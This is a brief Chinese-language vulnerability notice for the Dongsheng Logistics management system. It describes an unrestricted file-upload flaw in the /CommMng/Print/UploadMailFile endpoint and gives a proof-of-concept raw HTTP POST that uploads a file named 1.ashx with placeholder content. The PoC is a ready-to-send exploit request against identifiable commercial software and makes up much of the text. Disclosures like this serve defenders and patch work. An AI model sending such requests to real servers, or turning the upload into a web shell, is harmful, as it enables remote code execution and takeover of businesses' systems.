漏洞描述
东胜物流是一款专为物流企业设计的管理系统,提供多种功能以支持物流企业的日常运营。东胜物流系统中的 /CommMng/Print/UploadMailFile 接口存在文件上传漏洞,攻击者可以通过该接口上传恶意文件,可能导致服务器被控制或任意代码执行,对系统构成严重的安全威胁。
东胜物流 /CommMng/Print/UploadMailFile 文件上传漏洞
PoC代码
POST /CommMng/Print/UploadMailFile HTTP/1.1
Host:
Accept-Encoding: gzip
Connection: keep-alive
Content-Length: 203
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="LoadFile"; filename="1.ashx"
Content-Type: application/octet-stream
12312
------WebKitFormBoundary7MA4YWxkTrZu0gW--